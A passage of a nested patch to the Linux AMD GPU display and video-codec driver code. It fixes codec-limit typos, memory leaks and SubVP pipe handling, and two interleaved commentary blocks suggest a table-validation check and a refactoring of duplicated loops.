++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+ };
+@@ -166,7 +166,7 @@ static const struct amdgpu_video_codecs bg_video_codecs_encode = {
+ 
+ /* Yellow Carp*/
+ static const struct amdgpu_video_codec_info yc_video_codecs_decode_array[] = {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index e3b2b6b4f1a66..7cd17dda32ceb 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -103,10 +103,10 @@ static const struct amdgpu_video_codecs vega_video_codecs_encode =
+ /* Vega */
+ static const struct amdgpu_video_codec_info vega_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 4096, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ };
+@@ -120,10 +120,10 @@ static const struct amdgpu_video_codecs vega_video_codecs_decode =
+ /* Raven */
+ static const struct amdgpu_video_codec_info rv_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 4096, 4096, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 4096, 4096, 0)},
+@@ -138,10 +138,10 @@ static const struct amdgpu_video_codecs rv_video_codecs_decode =
+ /* Renoir, Arcturus */
+ static const struct amdgpu_video_codec_info rn_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4906, 3)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4906, 5)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4906, 4)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG2, 4096, 4096, 3)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4, 4096, 4096, 5)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VC1, 4096, 4096, 4)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index e08044008186e..8b297ade69a24 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -61,7 +61,7 @@ static const struct amdgpu_video_codecs vcn_4_0_0_video_codecs_encode =
+ 
+ static const struct amdgpu_video_codec_info vcn_4_0_0_video_codecs_decode_array[] =
+ {
+-	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4906, 52)},
++	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_MPEG4_AVC, 4096, 4096, 52)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_HEVC, 8192, 4352, 186)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_JPEG, 4096, 4096, 0)},
+ 	{codec_info_build(AMDGPU_INFO_VIDEO_CAPS_CODEC_IDX_VP9, 8192, 4352, 0)},
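Every nv.c/soc15.c/soc21.c hunk above corrects the same transposed constant: the decode caps advertised a 4906-pixel limit where 4096 was meant. Nothing in the build catches a typo like that; a table-validation pass of the following shape could, though struct codec_info here is a hypothetical stand-in for the fields codec_info_build() populates:

#include <stddef.h>

struct codec_info {
	unsigned int max_width;
	unsigned int max_height;
};

/* Every legitimate limit in these tables is a multiple of 16
 * (4096, 8192, 4352, ...); 4906 % 16 == 10, so it trips the check. */
static int validate_decode_caps(const struct codec_info *caps, size_t n)
{
	size_t i;

	for (i = 0; i < n; i++)
		if (caps[i].max_width % 16 || caps[i].max_height % 16)
			return -1;
	return 0;
}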
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index f0b01c8dc4a6b..f72c013d3a5b0 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -42,39 +42,6 @@
+ #include "dm_helpers.h"
+ #include "ddc_service_types.h"
+ 
+-struct monitor_patch_info {
+-	unsigned int manufacturer_id;
+-	unsigned int product_id;
+-	void (*patch_func)(struct dc_edid_caps *edid_caps, unsigned int param);
+-	unsigned int patch_param;
+-};
+-static void set_max_dsc_bpp_limit(struct dc_edid_caps *edid_caps, unsigned int param);
+-
+-static const struct monitor_patch_info monitor_patch_table[] = {
+-{0x6D1E, 0x5BBF, set_max_dsc_bpp_limit, 15},
+-{0x6D1E, 0x5B9A, set_max_dsc_bpp_limit, 15},
+-};
+-
+-static void set_max_dsc_bpp_limit(struct dc_edid_caps *edid_caps, unsigned int param)
+-{
+-	if (edid_caps)
+-		edid_caps->panel_patch.max_dsc_target_bpp_limit = param;
+-}
+-
+-static int amdgpu_dm_patch_edid_caps(struct dc_edid_caps *edid_caps)
+-{
+-	int i, ret = 0;
+-
+-	for (i = 0; i < ARRAY_SIZE(monitor_patch_table); i++)
+-		if ((edid_caps->manufacturer_id == monitor_patch_table[i].manufacturer_id)
+-			&&  (edid_caps->product_id == monitor_patch_table[i].product_id)) {
+-			monitor_patch_table[i].patch_func(edid_caps, monitor_patch_table[i].patch_param);
+-			ret++;
+-		}
+-
+-	return ret;
+-}
+-
+ /* dm_helpers_parse_edid_caps
+  *
+  * Parse edid caps
+@@ -149,8 +116,6 @@ enum dc_edid_status dm_helpers_parse_edid_caps(
+ 	kfree(sads);
+ 	kfree(sadb);
+ 
+-	amdgpu_dm_patch_edid_caps(edid_caps);
+-
+ 	return result;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index e0c8d6f09bb4b..074e70a5c458e 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -462,6 +462,7 @@ static enum bp_result get_gpio_i2c_info(
+ 	uint32_t count = 0;
+ 	unsigned int table_index = 0;
+ 	bool find_valid = false;
++	struct atom_gpio_pin_assignment *pin;
+ 
+ 	if (!info)
+ 		return BP_RESULT_BADINPUT;
+@@ -489,20 +490,17 @@ static enum bp_result get_gpio_i2c_info(
+ 			- sizeof(struct atom_common_table_header))
+ 				/ sizeof(struct atom_gpio_pin_assignment);
+ 
++	pin = (struct atom_gpio_pin_assignment *) header->gpio_pin;
++
+ 	for (table_index = 0; table_index < count; table_index++) {
+-		if (((record->i2c_id & I2C_HW_CAP) == (
+-		header->gpio_pin[table_index].gpio_id &
+-						I2C_HW_CAP)) &&
+-		((record->i2c_id & I2C_HW_ENGINE_ID_MASK)  ==
+-		(header->gpio_pin[table_index].gpio_id &
+-					I2C_HW_ENGINE_ID_MASK)) &&
+-		((record->i2c_id & I2C_HW_LANE_MUX) ==
+-		(header->gpio_pin[table_index].gpio_id &
+-						I2C_HW_LANE_MUX))) {
++		if (((record->i2c_id & I2C_HW_CAP) 				== (pin->gpio_id & I2C_HW_CAP)) &&
++		    ((record->i2c_id & I2C_HW_ENGINE_ID_MASK)	== (pin->gpio_id & I2C_HW_ENGINE_ID_MASK)) &&
++		    ((record->i2c_id & I2C_HW_LANE_MUX) 		== (pin->gpio_id & I2C_HW_LANE_MUX))) {
+ 			/* still valid */
+ 			find_valid = true;
+ 			break;
+ 		}
++		pin = (struct atom_gpio_pin_assignment *)((uint8_t *)pin + sizeof(struct atom_gpio_pin_assignment));
+ 	}
+ 
+ 	/* If we don't find the entry that we are looking for then
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+index 6f77d8e538ab1..9eb9fe5b8d2c5 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn32/dcn32_clk_mgr.c
+@@ -438,7 +438,7 @@ static void dcn32_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	}
+ 
+ 	if (!new_clocks->dtbclk_en) {
+-		new_clocks->ref_dtbclk_khz = 0;
++		new_clocks->ref_dtbclk_khz = clk_mgr_base->bw_params->clk_table.entries[0].dtbclk_mhz * 1000;
+ 	}
+ 
+ 	/* clock limits are received with MHz precision, divide by 1000 to prevent setting clocks at every call */
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 997ab031f816d..5260ad6de8038 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1070,6 +1070,7 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 	int i, j;
+ 	struct dc_state *dangling_context = dc_create_state(dc);
+ 	struct dc_state *current_ctx;
++	struct pipe_ctx *pipe;
+ 
+ 	if (dangling_context == NULL)
+ 		return;
+@@ -1112,6 +1113,16 @@ static void disable_dangling_plane(struct dc *dc, struct dc_state *context)
+ 		}
+ 
+ 		if (should_disable && old_stream) {
++			pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++			/* When disabling a plane for a phantom pipe, we must turn on the
++			 * phantom OTG so the disable programming gets the double buffer
++			 * update. Otherwise the pipe will be left in a partially disabled
++			 * state that can result in underflow or a hang when enabling it
++			 * again for a different use.
++			 */
++			if (old_stream->mall_stream_config.type == SUBVP_PHANTOM) {
++				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
++			}
+ 			dc_rem_all_planes_for_stream(dc, old_stream, dangling_context);
+ 			disable_all_writeback_pipes_for_stream(dc, old_stream, dangling_context);
+ 
+@@ -1760,6 +1771,12 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		context->stream_count == 0)
+ 		dc->hwss.prepare_bandwidth(dc, context);
+ 
++	/* When SubVP is active, all HW programming must be done while
++	 * SubVP lock is acquired
++	 */
++	if (dc->hwss.subvp_pipe_control_lock)
++		dc->hwss.subvp_pipe_control_lock(dc, context, true, true, NULL, subvp_prev_use);
++
+ 	if (dc->debug.enable_double_buffered_dsc_pg_support)
+ 		dc->hwss.update_dsc_pg(dc, context, false);
+ 
+@@ -1787,9 +1804,6 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		dc->hwss.wait_for_mpcc_disconnect(dc, dc->res_pool, pipe);
+ 	}
+ 
+-	if (dc->hwss.subvp_pipe_control_lock)
+-		dc->hwss.subvp_pipe_control_lock(dc, context, true, true, NULL, subvp_prev_use);
+-
+ 	result = dc->hwss.apply_ctx_to_hw(dc, context);
+ 
+ 	if (result != DC_OK) {
+@@ -3576,7 +3590,6 @@ static bool could_mpcc_tree_change_for_active_pipes(struct dc *dc,
+ 
+ 	struct dc_stream_status *cur_stream_status = stream_get_status(dc->current_state, stream);
+ 	bool force_minimal_pipe_splitting = false;
+-	uint32_t i;
+ 
+ 	*is_plane_addition = false;
+ 
+@@ -3608,27 +3621,11 @@ static bool could_mpcc_tree_change_for_active_pipes(struct dc *dc,
+ 		}
+ 	}
+ 
+-	/* For SubVP pipe split case when adding MPO video
+-	 * we need to add a minimal transition. In this case
+-	 * there will be 2 streams (1 main stream, 1 phantom
+-	 * stream).
++	/* For SubVP, when adding MPO video we need to add a minimal transition.
+ 	 */
+-	if (cur_stream_status &&
+-			dc->current_state->stream_count == 2 &&
+-			stream->mall_stream_config.type == SUBVP_MAIN) {
+-		bool is_pipe_split = false;
+-
+-		for (i = 0; i < dc->res_pool->pipe_count; i++) {
+-			if (dc->current_state->res_ctx.pipe_ctx[i].stream == stream &&
+-					(dc->current_state->res_ctx.pipe_ctx[i].bottom_pipe ||
+-					dc->current_state->res_ctx.pipe_ctx[i].next_odm_pipe)) {
+-				is_pipe_split = true;
+-				break;
+-			}
+-		}
+-
++	if (cur_stream_status && stream->mall_stream_config.type == SUBVP_MAIN) {
+ 		/* determine if minimal transition is required due to SubVP*/
+-		if (surface_count > 0 && is_pipe_split) {
++		if (surface_count > 0) {
+ 			if (cur_stream_status->plane_count > surface_count) {
+ 				force_minimal_pipe_splitting = true;
+ 			} else if (cur_stream_status->plane_count < surface_count) {
+@@ -3650,10 +3647,32 @@ static bool commit_minimal_transition_state(struct dc *dc,
+ 	bool temp_subvp_policy;
+ 	enum dc_status ret = DC_ERROR_UNEXPECTED;
+ 	unsigned int i, j;
++	unsigned int pipe_in_use = 0;
+ 
+ 	if (!transition_context)
+ 		return false;
+ 
++	/* check current pipes in use */
++	for (i = 0; i < dc->res_pool->pipe_count; i++) {
++		struct pipe_ctx *pipe = &transition_base_context->res_ctx.pipe_ctx[i];
++
++		if (pipe->plane_state)
++			pipe_in_use++;
++	}
++
++	/* When the OS adds a new surface while all pipes are in use by the ODM
++	 * combine and MPC split features, commit_minimal_transition_state must be
++	 * used to transition safely. After the OS exits MPO it goes back to using
++	 * ODM and MPC split with all pipes, so we call it again; otherwise return true to skip.
++	 *
++	 * This reduces the scenarios using dc_commit_state_no_check at flip time,
++	 * especially entering/exiting MPO while DCN still has enough resources.
++	 */
++	if (pipe_in_use != dc->res_pool->pipe_count) {
++		dc_release_state(transition_context);
++		return true;
++	}
++
+ 	if (!dc->config.is_vmin_only_asic) {
+ 		tmp_mpc_policy = dc->debug.pipe_split_policy;
+ 		dc->debug.pipe_split_policy = MPC_SPLIT_AVOID;
+diff --git a/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c b/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c
+index fc6aa098bda06..8db9f75144662 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dce60/dce60_resource.c
+@@ -1128,6 +1128,7 @@ struct resource_pool *dce60_create_resource_pool(
+ 	if (dce60_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+@@ -1325,6 +1326,7 @@ struct resource_pool *dce61_create_resource_pool(
+ 	if (dce61_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+@@ -1518,6 +1520,7 @@ struct resource_pool *dce64_create_resource_pool(
+ 	if (dce64_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c b/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c
+index b28025960050c..5825e6f412bd7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dce80/dce80_resource.c
+@@ -1137,6 +1137,7 @@ struct resource_pool *dce80_create_resource_pool(
+ 	if (dce80_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+@@ -1336,6 +1337,7 @@ struct resource_pool *dce81_create_resource_pool(
+ 	if (dce81_construct(num_virtual_links, dc, pool))
+ 		return &pool->base;
+ 
++	kfree(pool);
+ 	BREAK_TO_DEBUGGER();
+ 	return NULL;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index 11e4c4e469473..c06538c37a11f 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -867,6 +867,32 @@ static void false_optc_underflow_wa(
+ 		tg->funcs->clear_optc_underflow(tg);
+ }
+ 
++static int calculate_vready_offset_for_group(struct pipe_ctx *pipe)
++{
++	struct pipe_ctx *other_pipe;
++	int vready_offset = pipe->pipe_dlg_param.vready_offset;
++
++	/* Always use the largest vready_offset of all connected pipes */
++	for (other_pipe = pipe->bottom_pipe; other_pipe != NULL; other_pipe = other_pipe->bottom_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->top_pipe; other_pipe != NULL; other_pipe = other_pipe->top_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->next_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->next_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->prev_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->prev_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++
++	return vready_offset;
++}
++
+ enum dc_status dcn10_enable_stream_timing(
+ 		struct pipe_ctx *pipe_ctx,
+ 		struct dc_state *context,
+@@ -910,7 +936,7 @@ enum dc_status dcn10_enable_stream_timing(
+ 	pipe_ctx->stream_res.tg->funcs->program_timing(
+ 			pipe_ctx->stream_res.tg,
+ 			&stream->timing,
+-			pipe_ctx->pipe_dlg_param.vready_offset,
++			calculate_vready_offset_for_group(pipe_ctx),
+ 			pipe_ctx->pipe_dlg_param.vstartup_start,
+ 			pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 			pipe_ctx->pipe_dlg_param.vupdate_width,
+@@ -2900,7 +2926,7 @@ void dcn10_program_pipe(
+ 
+ 		pipe_ctx->stream_res.tg->funcs->program_global_sync(
+ 				pipe_ctx->stream_res.tg,
+-				pipe_ctx->pipe_dlg_param.vready_offset,
++				calculate_vready_offset_for_group(pipe_ctx),
+ 				pipe_ctx->pipe_dlg_param.vstartup_start,
+ 				pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 				pipe_ctx->pipe_dlg_param.vupdate_width);
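calculate_vready_offset_for_group() above, duplicated verbatim in the dcn20_hwseq.c hunk that follows, is a max-reduction over the four directions a pipe can be linked in an MPC/ODM group. The four near-identical loops could be collapsed with a link-accessor helper; a sketch under that assumption, with a hypothetical struct pipe standing in for pipe_ctx:

struct pipe {
	int vready_offset;
	struct pipe *bottom, *top, *next_odm, *prev_odm;
};

/* Follow one link direction, folding in the maximum vready_offset. */
static int scan(const struct pipe *p,
		const struct pipe *(*next)(const struct pipe *), int max)
{
	for (; p; p = next(p))
		if (p->vready_offset > max)
			max = p->vready_offset;
	return max;
}

static const struct pipe *go_bottom(const struct pipe *p)   { return p->bottom; }
static const struct pipe *go_top(const struct pipe *p)      { return p->top; }
static const struct pipe *go_next_odm(const struct pipe *p) { return p->next_odm; }
static const struct pipe *go_prev_odm(const struct pipe *p) { return p->prev_odm; }

static int vready_offset_for_group(const struct pipe *pipe)
{
	int max = pipe->vready_offset;	/* seed with the pipe's own value */

	max = scan(pipe->bottom, go_bottom, max);
	max = scan(pipe->top, go_top, max);
	max = scan(pipe->next_odm, go_next_odm, max);
	max = scan(pipe->prev_odm, go_prev_odm, max);
	return max;
}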
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+index a7e0001a8f46d..f348bc15a9256 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn20/dcn20_hwseq.c
+@@ -1616,6 +1616,31 @@ static void dcn20_update_dchubp_dpp(
+ 		hubp->funcs->phantom_hubp_post_enable(hubp);
+ }
+ 
++static int calculate_vready_offset_for_group(struct pipe_ctx *pipe)
++{
++	struct pipe_ctx *other_pipe;
++	int vready_offset = pipe->pipe_dlg_param.vready_offset;
++
++	/* Always use the largest vready_offset of all connected pipes */
++	for (other_pipe = pipe->bottom_pipe; other_pipe != NULL; other_pipe = other_pipe->bottom_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->top_pipe; other_pipe != NULL; other_pipe = other_pipe->top_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->next_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->next_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++	for (other_pipe = pipe->prev_odm_pipe; other_pipe != NULL; other_pipe = other_pipe->prev_odm_pipe) {
++		if (other_pipe->pipe_dlg_param.vready_offset > vready_offset)
++			vready_offset = other_pipe->pipe_dlg_param.vready_offset;
++	}
++
++	return vready_offset;
++}
+ 
+ static void dcn20_program_pipe(
+ 		struct dc *dc,
+@@ -1634,16 +1659,14 @@ static void dcn20_program_pipe(
+ 			&& !pipe_ctx->prev_odm_pipe) {
+ 		pipe_ctx->stream_res.tg->funcs->program_global_sync(
+ 				pipe_ctx->stream_res.tg,
+-				pipe_ctx->pipe_dlg_param.vready_offset,
++				calculate_vready_offset_for_group(pipe_ctx),
+ 				pipe_ctx->pipe_dlg_param.vstartup_start,
+ 				pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 				pipe_ctx->pipe_dlg_param.vupdate_width);
+ 
+ 		if (pipe_ctx->stream->mall_stream_config.type != SUBVP_PHANTOM) {
+-			pipe_ctx->stream_res.tg->funcs->wait_for_state(
+-				pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
+-			pipe_ctx->stream_res.tg->funcs->wait_for_state(
+-				pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VBLANK);
++			pipe_ctx->stream_res.tg->funcs->wait_for_state(pipe_ctx->stream_res.tg, CRTC_STATE_VACTIVE);
+ 		}
+ 
+ 		pipe_ctx->stream_res.tg->funcs->set_vtg_params(
+@@ -2037,7 +2060,7 @@ bool dcn20_update_bandwidth(
+ 
+ 			pipe_ctx->stream_res.tg->funcs->program_global_sync(
+ 					pipe_ctx->stream_res.tg,
+-					pipe_ctx->pipe_dlg_param.vready_offset,
++					calculate_vready_offset_for_group(pipe_ctx),
+ 					pipe_ctx->pipe_dlg_param.vstartup_start,
+ 					pipe_ctx->pipe_dlg_param.vupdate_offset,
+ 					pipe_ctx->pipe_dlg_param.vupdate_width);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index df4f251191424..e4472c6be6c32 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -225,11 +225,7 @@ static void dccg32_set_dtbclk_dto(
+ 	} else {
+ 		REG_UPDATE_2(OTG_PIXEL_RATE_CNTL[params->otg_inst],
+ 				DTBCLK_DTO_ENABLE[params->otg_inst], 0,
+-				PIPE_DTO_SRC_SEL[params->otg_inst], 1);
+-		if (params->is_hdmi)
+-			REG_UPDATE(OTG_PIXEL_RATE_CNTL[params->otg_inst],
+-				PIPE_DTO_SRC_SEL[params->otg_inst], 0);
+-
++				PIPE_DTO_SRC_SEL[params->otg_inst], params->is_hdmi ? 0 : 1);
+ 		REG_WRITE(DTBCLK_DTO_MODULO[params->otg_inst], 0);
+ 		REG_WRITE(DTBCLK_DTO_PHASE[params->otg_inst], 0);
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index d1598e3131f66..33ab6fdc36175 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1901,7 +1901,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 
+ 		pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_dal;
+ 		if (context->stream_count == 1 &&
+-				context->stream_status[0].plane_count <= 1 &&
++				context->stream_status[0].plane_count == 1 &&
+ 				!dc_is_hdmi_signal(res_ctx->pipe_ctx[i].stream->signal) &&
+ 				is_h_timing_divisible_by_2(res_ctx->pipe_ctx[i].stream) &&
+ 				pipe->stream->timing.pix_clk_100hz * 100 > DCN3_2_VMIN_DISPCLK_HZ &&
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index 2abe3967f7fbd..d1bf49d207de4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -531,9 +531,11 @@ void dcn32_set_phantom_stream_timing(struct dc *dc,
+ 	unsigned int i, pipe_idx;
+ 	struct pipe_ctx *pipe;
+ 	uint32_t phantom_vactive, phantom_bp, pstate_width_fw_delay_lines;
++	unsigned int num_dpp;
